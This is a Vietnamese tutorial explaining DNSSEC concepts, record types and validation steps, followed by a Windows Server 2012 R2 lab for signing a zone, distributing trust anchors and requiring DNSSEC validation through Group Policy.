<p>Giao thức DNS thiếu hụt tính bảo mật do không có công cụ xác thực nguồn dữ liệu được trao đổi giữa máy chủ (DNS Server) và máy trạm (Client), hoặc quá trình chuyển tiếp (Forwarder) giữa máy chủ này đến máy chủ khác trong Domain. Trước nguy cơ dữ liệu DNS có thể bị giả mạo và làm sai lệch, DNSSEC ra đời để giải quyết vấn đề này.</p>
<p>DNSSEC (Domain Name System Security Extensions), là một giao thức mở rộng trên nền DNS, cung cấp khả năng chứng thực (Authentication) và đảm bảo dữ liệu được toàn vẹn (Integrity) cho hệ thống DNS.</p>
<p>Gồm 3 mục tiêu chính :</p>
<ul>
<li><b>Sender Authentication</b> : chứng thực dữ liệu cho quá trình gửi đi</li>
<li><b>Data Integrity</b>: bảo vệ toàn vẹn dữ liệu trong quá trình truyền, giúp người nhận được đảm bảo dữ liệu không bị thay đổi.</li>
<li><b>Authenticated denial of existence</b>: ngăn chặn kẻ tấn công, chúng phá hoại bằng cách tự động gửi xác nhận là không tồn tại dữ liệu mà Client truy vấn.</li>
</ul>
<p><b>3) </b><b>Ư</b><b>u v</b><b>à</b><b> nh</b><b>ượ</b><b>c </b><b>đ</b><b>i</b><b>ể</b><b>m c</b><b>ủ</b><b>a DNS</b></p>
<p>Giao thức DNS chống lại các loại tấn công như :</p>
<ul>
<li><b>Cache Poisoning or cache pollution</b> : ngăn chặn cố gắng tấn công và đầu độc Cache DNS Server.</li>
<li><b>Interference with DNS data on Secondary server</b> : ngăn chặn attacker giả mạo làm DNS Primary Server để gửi các gói Update DNS qua cho các máy DNS Secondary Server để cập nhật.</li>
<li><b>Data interception</b> : ngăn chặn kẻ tấn công can thiệp vào dữ liệu, khi dữ liệu đang được gửi đi. (Prevent Spoofing)</li>
</ul>
<p>Sau đây là đoạn video mô tả về DNS Spoofing :</p>
<div id="scid:5737277B-5D6D-4f48-ABFC-DD9C333F4C5D:a9fbde7f-d538-4e13-a1d0-5702c5e94b71" class="wlWriterEditableSmartContent">
<p><span class="embed-youtube"><a href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DhKG0gFpWD7o">https://www.youtube.com/watch?v=hKG0gFpWD7o</a></span></p>
</div>
<p>DNS spoofing (giả mạo) là 1 kiểu tấn nhằm mục đích giả mạo DNS server để dùng các thông tin giả mạo trả lời lại client. Tấn công giả mạo này, kẻ tấn công sẽ cố gắng đoán xem DNS client or DNS server có gửi 1 truy vấn DNS nào không hoặc ngồi đợi 1 DNS response. Từ đó, sau khi lắng nghe thì attacker sẽ insert 1 DNS response giả mạo vào DNS server’s cache, quá trình này được gọi là cache posoining (đầu độc cache DNS server). Việc giả mạo này làm cho các máy chủ DNS server thì không có cách nào chứng thực được DNS data là hợp pháp, và sẽ dùng các thông tin này trả lời (reply) lại cho các client. Một kẻ tấn công cũng có thể set Time-to-Live (TTL) trên dữ liệu DNS giả với 1 con số lớn, vì thế DNS server sẽ cache (lưu lại) đoạn DNS bị đầu độc này với khoảng thời gian dài (nhiều tiếng hoặc nhiều ngày).</p>
<p>Nhược điểm của DNS là chưa giải quyết được các vấn đề như : Packet Sniffing, DDoS Attack, Phishing and Pharming.</p>
<p><b>4) Cấu trúc của </b><b>DNSSEC</b></p>
<p>Thay vì hệ thống DNS có 4 phần tử chính : Delegation, Zone file management, Zone file distribution, resolving. Thì giờ đây sẽ có thêm 2 phần tử đó là Zone File Signing và Verifying để trở thành DNSSEC.</p>
<p><b>a) Đ</b><b>ố</b><b>i v</b><b>ớ</b><b>i quá trình Zone File Signing</b></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F311.jpg" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="3" src="https://huypd.files.wordpress.com/2013/11/31_thumb.jpg?w=726&amp;h=404" alt="3" width="726" height="404" border="0"/></a></p>
<p>Zone signing là nơi DNSSEC thực hiện ký (signing) cho các zone dữ liệu và các phần tử (record) trong zone dữ liệu đó. Bao gồm 4 loại bản ghi mới và mỗi bản ghi đều có thông số TTL (Time-To-Live) :</p>
<ul>
<li><b>DNS Public Key (DNSKEY) :</b> bằng cách dùng Public Key tạo ra DNSKEY và sử dụng DNSKEY để ký (signed) cho zone.</li>
<li><b>DNS Private Key (RRSIG) </b>: sử dụng để ký (signed) cho các record trong zone, bằng cách chúng sẽ dùng private key để tạo ra một chữ ký số (RRSIG) và RRSIG này sẽ được thêm vào mỗi record trong zone.</li>
<li><b>NSEC (Next-Secure)</b> : Authenticated denial of existence . Nếu client truy vấn 1 record trong DNS mà nó không có thì DNS server gửi trả lại là không tìm thấy record, nhưng việc này cũng cần phải được xác minh. NSEC record sẽ thực hiện nhiệm vụ này bằng cách tạo ra 1 chuỗi liên kết giữa các tài nguyên record lại với nhau. NSEC record sẽ được tạo ra và trong mỗi NSEC record đều có 1 Pointer chỉ tới NSEC record kế tiếp. NSEC record cuối cùng sẽ được trỏ tới NSEC record đầu tiên. (Như hình trên)</li>
<li><b>DS (Delegation Signer)</b> : mỗi child domain (child zone – <span class="skimlinks-unlinked">tphcm.huypd.com</span>) sẽ tạo ra một DS để gửi lên Parent Zone (Forest zone – <span class="skimlinks-unlinked">huypd.com</span>). DS này chứa DNSKEY của child zone đó. Dùng để thiết lập chứng thực giữa các zone trong Forest, thường dùng cho việc forwarder hoặc transfer zone.</li>
</ul>
<div id="scid:5737277B-5D6D-4f48-ABFC-DD9C333F4C5D:b8ae7a99-4a66-4182-9337-2b9ff9e78ef4" class="wlWriterEditableSmartContent">
<p><span class="embed-youtube"><a href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DufPklFNKzJE">https://www.youtube.com/watch?v=ufPklFNKzJE</a></span></p>
</div>
<p> </p>
<p><b>b) Đ</b><b>ố</b><b>i v</b><b>ớ</b><b>i quá trình Verifying</b></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F26.jpg" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="2" src="https://huypd.files.wordpress.com/2013/11/26_thumb.jpg?w=733&amp;h=502" alt="2" width="733" height="502" border="0"/></a></p>
<p>1) Khi client gửi truy vấn tìm kiếm địa chỉ <a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fwww.tphcm.huypd.com%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">www.tphcm.huypd.com</a> tới Local DNS Server.</p>
<p>2) Local Server sẽ đi đến các Root Server để hỏi <strong>domain <span class="skimlinks-unlinked">huypd.com</span></strong> và Root Server sẽ hướng dẫn Local Server đi đến trực tiếp Authoritative DNS Server của domain <span class="skimlinks-unlinked">huypd.com</span>cần tìm.</p>
<p>3) Sau đó Local DNS Server sẽ đến Authoritative DNS Server <span class="skimlinks-unlinked">huypd.com</span> để hỏi DNS Server <span class="skimlinks-unlinked">tphcm.huypd.com</span>, DNS Server <span class="skimlinks-unlinked">huypd.com</span> sẽ hướng dẫn Local DNS Server đi đến thẳng Authoritative DNS Server chịu trách nhiệm domain <span class="skimlinks-unlinked">tphcm.huypd.com</span></p>
<p>4) Local DNS Server <span class="skimlinks-unlinked">abc.com</span> tiếp tục đến DNS Server <span class="skimlinks-unlinked">tphcm.huypd.com</span> để hỏi địa chỉ<a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fwww.tphcm.huypd.com%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">www.tphcm.huypd.com</a></p>
<p>5) Lúc này DNS Server sẽ kiểm tra trong zone và thấy có record www, DNS Server sẽ trả lời lại Local DNS Server <span class="skimlinks-unlinked">abc.com</span> bằng gói tin DNS Response bao gồm địa chỉ IP, DNSKEY, RRSIG.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F17.jpg" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="1" src="https://huypd.files.wordpress.com/2013/11/17_thumb.jpg?w=739&amp;h=405" alt="1" width="739" height="405" border="0"/></a></p>
<p>6) Sau khi Local DNS Server nhận được gói DNS Response, lúc này nó cần phải kiểm tra xem dữ liệu DNS Response có phải đúng DNS Server <span class="skimlinks-unlinked">tphcm.huypd.com</span> gửi hay không ? Bằng cách đi lên Parent zone (tức DNS Server <span class="skimlinks-unlinked">huypd.com</span>) để xin số Delegation Signer (DS).</p>
<p>7) DNS Server <span class="skimlinks-unlinked">huypd.com</span> sẽ gửi số DS về cho Local DNS Server <span class="skimlinks-unlinked">abc.com</span>.</p>
<p>8) Sau khi nhận được DS, Local DNS Server <span class="skimlinks-unlinked">abc.com</span> lấy số DNSKEY trong gói tin DNS Response đem đi Hash với DS. Và ra một giá trị Hash 1.</p>
<p>9) Tiếp tục, Local DNS Server lấy DNSKEY và RRSIG đem đi Hash và ra một giá trị Hash 2</p>
<p>10) Lấy HASH 1 so sánh với HASH 2 xem có bằng nhau không, nếu bằng nhau thì dữ liệu là chính xác. Sau đó Local DNS Server sẽ xét các thông tin trong RRSIG (bao gồm thời gian RRSIG, Time To Live).</p>
<p>11) Sau khi đã xác minh, lúc này dữ liệu đã hoàn toàn chính xác, Local DNS Server trả về cho Client truy vấn.</p>
<p>Tham khảo video Verifying :</p>
<div id="scid:5737277B-5D6D-4f48-ABFC-DD9C333F4C5D:9fdfba23-1bb8-4ef5-9055-74f430994a82" class="wlWriterEditableSmartContent">
<p><span class="embed-youtube"><a href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D3UU1WZy-0ns">https://www.youtube.com/watch?v=3UU1WZy-0ns</a></span></p>
</div>
<p><b>5) Các thành phần khác của DNSSEC</b></p>
<ul>
<li><strong>Trust anchor</strong> : Trust anchor là DNSKEY và DS được cấu hình bằng tay và được ép vào 1 zone cụ thể nào đó. Nếu DNS server đang chạy trên Domain controller, trust anchors sẽ được lưu ở partition trong Active Directory Domain Services (AD DS) và có thể được replicate (nhân) sang tất cả các DC/ADC (Authoritative DNS Server) khác trong domain. Còn nếu trên một máy chủ DNS độc lập, trust anchor sẽ được lưu và đặt tên file là <b><span class="skimlinks-unlinked">TrustAnchor.dns</span> </b>. Một DNS server chạy trên Windows Server 2012 sẽ cho phép người quản trị cấu hình trust anchor trong DNS Manager (phần <b>Trust Point</b>). Lưu ý : các máy DNS Server nào là Non-authoritative DNS Server thì lúc Re-sign hoặc Re-new DNSKEY (DS), bạn phải update bằng tay lại cho chúng.</li>
<li><strong>Key rollover :</strong>  tạo key, lưu trữ key,gia hạn key, làm mới key được Key rollover quản lý. Trong Windows Server 2012, Active Directory sẽ được lưu trữ và làm nhiệm vụ replicate, và tự động rollover.</li>
<li><strong>DNS Aware :</strong> để có thể dùng tính năng DNSSEC, Client và Server phải kích hoạt tính năng truy vấn DNS bằng giao thức DNSSEC. Thường các Client hỗ trợ DNSSEC (Windows 7/8/8.1), đối với Windows Server là WS 2008 R2/2012/2012 R2.</li>
<li><strong>Key Master</strong> : Public Key Và Private Key là do Key Master tạo ra dựa trên các thuật toán Cryptographic Algorithm. Mỗi một zone sẽ được một Key Master quản lý. Key master có thể nằm bất kỳ máy DC/ADC (Authoritative DNS Server) trong domain.</li>
</ul>
<p> </p>
<p><span style="color: #ff0000;">A) Giới thiệu</span></p>
<p>Lab “Cấu hình và kiểm tra DNSSEC”. Bài lab bao gồm các bước cấu hình và kiểm tra tính năng DNSSEC, thực hiện sign – unsign zone, kiểm tra Trust Anchors, cấu hình DNSKEY, RRSIG và thiết lập Key Master cho zone.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F6666664.jpg" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="666666" src="https://huypd.files.wordpress.com/2013/11/666666_thumb4.jpg?w=665&amp;h=497" alt="666666" width="665" height="497" border="0"/></a></p>
<p>Mô tả :</p>
<ul>
<li>Máy DC (172.1.1.1/24) : Nâng cấp DC với domain “<span class="skimlinks-unlinked">huypd.com</span>”. Cấu hình DNSSEC, tạo một zone có tên là “<span class="skimlinks-unlinked">dnssec.huypd.com</span>”, tạo một record A cho host “<span class="skimlinks-unlinked">dc.dnssec.huypd.com</span>”</li>
<li>Máy ADC (172.1.1.2/24) : Join domain, nâng cấp lên thành Additional DC. Cấu hình địa chỉ IP và DNS như trong hình.</li>
<li>Máy DNS (172.1.1.3/24) : Join domain, cài đặt role DNS, đặt địa chỉ IP và DNS như trong hình, cấu hình forwarder cho DNS.</li>
<li>Máy Client (172.1.1.4/24) : Join domain, đặt địa chỉ IP + DNS như hình trên.</li>
</ul>
<p><strong><span style="color: #ff0000;">B) Thực hiện</span></strong></p>
<p><strong>1) Prepare and configure requirement</strong></p>
<ul>
<li>Máy DC : đặt IP, DNS trỏ về chính mình. Thực hiện nâng cấp domain tại bài viết <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.wordpress.com%2F2013%2F09%2F09%2Fnang-cap-domain-controller-trong-windows-server-2012-r2%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">này</a>, sau đó tạo zone “<span class="skimlinks-unlinked">dnssec.huypd.com</span>”, vào zone <span class="skimlinks-unlinked">dnssec.huypd.com</span> tạo một record A “<span class="skimlinks-unlinked">dc.dnssec.huypd.com</span>”</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F02.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="Hướng dẫn DNSSEC (DNS Security Extension) Full - Windows Server 2012 R2 6" src="https://huypd.files.wordpress.com/2013/11/0_thumb1.png?w=498&amp;h=348" alt="Hướng dẫn DNSSEC (DNS Security Extension) Full - Windows Server 2012 R2 2" width="498" height="348" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F011.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="0 1" src="https://huypd.files.wordpress.com/2013/11/01_thumb1.png?w=486&amp;h=379" alt="0 1" width="486" height="379" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F03.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="0 3" src="https://huypd.files.wordpress.com/2013/11/03_thumb.png?w=488&amp;h=381" alt="0 3" width="488" height="381" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F05.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="0 5" src="https://huypd.files.wordpress.com/2013/11/05_thumb.png?w=491&amp;h=343" alt="0 5" width="491" height="343" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F06.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="0 6" src="https://huypd.files.wordpress.com/2013/11/06_thumb.png?w=301&amp;h=305" alt="0 6" width="301" height="305" border="0"/></a></p>
<ul>
<li>Máy ADC : đặt IP, DNS. Thực hiện nâng cấp Additional Domain Controller</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F41.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="4 1" src="https://huypd.files.wordpress.com/2013/11/41_thumb.png?w=623&amp;h=458" alt="4 1" width="623" height="458" border="0"/></a></p>
<ul>
<li>Máy DNS : đặt IP, DNS (trong hình). Cài đặt role DNS và cấu hình Forwarder</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F81.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="8" src="https://huypd.files.wordpress.com/2013/11/8_thumb1.png?w=631&amp;h=440" alt="8" width="631" height="440" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F91.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="9" src="https://huypd.files.wordpress.com/2013/11/9_thumb1.png?w=396&amp;h=458" alt="9" width="396" height="458" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F101.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="10" src="https://huypd.files.wordpress.com/2013/11/10_thumb1.png?w=473&amp;h=393" alt="10" width="473" height="393" border="0"/></a></p>
<ul>
<li>Máy Client Computer : join domain, đặt IP + DNS như trong hình</li>
</ul>
<p><strong>2) Query an unsigned zone without DNSSEC validation required (thực hiện truy vấn zone <span class="skimlinks-unlinked">dnssec.huypd.com</span> ở cơ chế DNS thông thường)</strong></p>
<ul>
<li>Máy Client : mở Windows Powershell –&gt; gõ “ resolve-dnsname <span class="skimlinks-unlinked">dc.dnssec.huypd.com</span> –server dns –dnssecok”. Ta thấy lúc này không có thông tin gì về RRSIG, TTL, thời gian signed và expiration….</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F110.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="1" src="https://huypd.files.wordpress.com/2013/11/1_thumb1.png?w=644&amp;h=473" alt="1" width="644" height="473" border="0"/></a></p>
<p><strong>3) Sign zone <span class="skimlinks-unlinked">dnssec.huypd.com</span> on DC and distribute trust anchors (Thực hiện ký zone <span class="skimlinks-unlinked">dnssec.huypd.com</span> và phân phối Trust anchors – DNSKEY cho máy DNS và ADC)</strong></p>
<ul>
<li>Máy DC vào DNS –&gt; Chuột phải zone “<span class="skimlinks-unlinked">dnssec.huypd.com</span>” và chọn DNSSEC –&gt; Sign the zone</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F111.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="1" src="https://huypd.files.wordpress.com/2013/11/1_thumb2.png?w=630&amp;h=440" alt="1" width="630" height="440" border="0"/></a></p>
<ul>
<li>Chọn “Use default settings to sign the zone” : theo tùy chọn mặc định của hệ thống</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F29.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="2" src="https://huypd.files.wordpress.com/2013/11/2_thumb1.png?w=481&amp;h=336" alt="2" width="481" height="336" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F33.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="3" src="https://huypd.files.wordpress.com/2013/11/3_thumb1.png?w=475&amp;h=332" alt="3" width="475" height="332" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F42.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="4" src="https://huypd.files.wordpress.com/2013/11/4_thumb1.png?w=479&amp;h=335" alt="4" width="479" height="335" border="0"/></a></p>
<ul>
<li>Tiếp theo ta phân phối trust anchor cho máy DNS. Bằng cách trên máy DC, vào đường dẫn “C:\Windows\System32”. Tìm thư mục “dns”</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F51.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="5" src="https://huypd.files.wordpress.com/2013/11/5_thumb1.png?w=622&amp;h=416" alt="5" width="622" height="416" border="0"/></a></p>
<ul>
<li>Thực hiện share thư mục này với quyền Full Control</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F61.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="6" src="https://huypd.files.wordpress.com/2013/11/6_thumb1.png?w=623&amp;h=417" alt="6" width="623" height="417" border="0"/></a></p>
<ul>
<li>Qua máy DNS, thực hiện Import DNSKEY vào –&gt; Chuột phải Trust point, chọn Import –&gt; DNSKEY</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F71.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="7" src="https://huypd.files.wordpress.com/2013/11/7_thumb1.png?w=649&amp;h=453" alt="7" width="649" height="453" border="0"/></a></p>
<ul>
<li>Trỏ tới thư mục share –&gt; chọn “<span class="skimlinks-unlinked">ketset-dnssec.huypd.com</span>”</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F82.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="8" src="https://huypd.files.wordpress.com/2013/11/8_thumb2.png?w=304&amp;h=138" alt="8" width="304" height="138" border="0"/></a></p>
<ul>
<li>Lúc này ta đã import 2 DNSKEY vào, 1 key Active và 1 key Standby</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F92.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="9" src="https://huypd.files.wordpress.com/2013/11/9_thumb2.png?w=640&amp;h=452" alt="9" width="640" height="452" border="0"/></a></p>
<ul>
<li>Máy DNS, mở PowerShell, thực hiện 2 lệnh “resolve-dnsname –name<span class="skimlinks-unlinked">dnssec.huypd.com.trustanchors</span> –type dnskey-server dns” và lệnh “ get-dnsservertrustanchor <span class="skimlinks-unlinked">dnssec.huypd.com</span>” để kiểm tra xem key đã import chưa.</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F102.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="10" src="https://huypd.files.wordpress.com/2013/11/10_thumb2.png?w=637&amp;h=468" alt="10" width="637" height="468" border="0"/></a></p>
<ul>
<li>Thực hiện distribute Trust Anchors (tức phân phối DNSKEY) cho máy ADC. Trên máy DC, chuột phải vào zone và chọn DNSSEC –&gt; Properties</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F112.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="11" src="https://huypd.files.wordpress.com/2013/11/11_thumb1.png?w=644&amp;h=487" alt="11" width="644" height="487" border="0"/></a></p>
<ul>
<li>Qua thẻ “Trust Anchor” : check vào ô đầu tiên, để thực hiện phân phối cho tất cả các máy DC/ADC (Authoritative DNS Server) trong domain</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F121.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="12" src="https://huypd.files.wordpress.com/2013/11/12_thumb1.png?w=342&amp;h=412" alt="12" width="342" height="412" border="0"/></a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F131.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="13" src="https://huypd.files.wordpress.com/2013/11/13_thumb1.png?w=326&amp;h=110" alt="13" width="326" height="110" border="0"/></a></p>
<ul>
<li>Kiểm tra và ta thấy lúc này đã replicate qua cho máy ADC</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F141.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="14" src="https://huypd.files.wordpress.com/2013/11/14_thumb1.png?w=573&amp;h=400" alt="14" width="573" height="400" border="0"/></a></p>
<p><strong>4) Query a signed zone without DNSSEC validation required (Client chưa cấu hình tính năng DNSSEC, kiểm tra DNSSEC bằng cách dùng lệnh truy vấn thử<span class="skimlinks-unlinked">dnssec.huypd.com</span>)</strong></p>
<ul>
<li>Máy Client gõ “resolve-dnsname <span class="skimlinks-unlinked">dc.dnssec.huypd.com</span> –server dns –dnssecok” . Lệnh này để test thử tính năng truy vấn bằng DNSSEC. Lúc này ta đã thấy các thông số của DNSSEC</li>
<li>Lệnh “get-dnsclientnrptpolicy” là lệnh kiểm tra máy client có enable tính năng DNSSEC hay chưa.</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F113.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="1" src="https://huypd.files.wordpress.com/2013/11/1_thumb3.png?w=522&amp;h=487" alt="1" width="522" height="487" border="0"/></a></p>
<p><strong>5) Query a signed zone with DNSSEC validation required (Thực hiện enable tính năng DNSSEC cho các Client bằng Policy, sau đó kiểm tra lại việc truy vấn)</strong></p>
<ul>
<li>Máy DC, vào Group Policy –&gt; Cấu hình chính sách “Default Domain Policy” –&gt; Chuột phải chọn “Edit”</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F114.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="1" src="https://huypd.files.wordpress.com/2013/11/1_thumb4.png?w=625&amp;h=439" alt="1" width="625" height="439" border="0"/></a></p>
<ul>
<li>Chọn “Computer Configuration –&gt; Policies –&gt; Windows Settings –&gt; Name Resolution Table” –&gt; Stick vào 2 dấu “Enable DNSSEC in the rule” và “Require DNS clients to check that name and address data….”. Trên cùng chọn Suffix và khai báo zone DNSSEC vào “<span class="skimlinks-unlinked">dnssec.huypd.com</span>” –&gt; Cuối cùng là chọn “Create” và “Apply”</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F210.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="2" src="https://huypd.files.wordpress.com/2013/11/2_thumb2.png?w=631&amp;h=479" alt="2" width="631" height="479" border="0"/></a></p>
<ul>
<li>Máy DC, thực hiện “gpupdate /force” và “get-dnsclientnrptpolicy” để xem thông số cấu hình tính năng DNSSEC.</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F34.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="3" src="https://huypd.files.wordpress.com/2013/11/3_thumb2.png?w=638&amp;h=469" alt="3" width="638" height="469" border="0"/></a></p>
<ul>
<li>Máy Client cũng thực hiện “gpupdate /force” và  lệnh “get-dnsclientnrptpolicy”. Thông số “DNSSecValidationRequired” mà là True thì lúc này tất cả các client trong domain đều áp dụng tính năng truy vấn bằng DNSSEC.</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F43.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="4" src="https://huypd.files.wordpress.com/2013/11/4_thumb2.png?w=580&amp;h=475" alt="4" width="580" height="475" border="0"/></a></p>
<p><strong>6) Un-sign the zone and then re-sign the zone with custom parameters (Thực hiện Un-Sign và Re-sign lại zone)</strong></p>
<ul>
<li>Chuột phải zone –&gt; DNSSEC chọn Unsign the zone</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fhuypd.files.wordpress.com%2F2013%2F11%2F115.png" rel="noopener external nofollow" class="ext-image" onclick="this.target='_blank';"><img decoding="async" loading="lazy" title="1" src="https://huypd.files.wordpress.com/2013/11/1_thumb5.png?w=582&amp;h=406" alt="1" width="582" height="406" border="0"/></a></p>
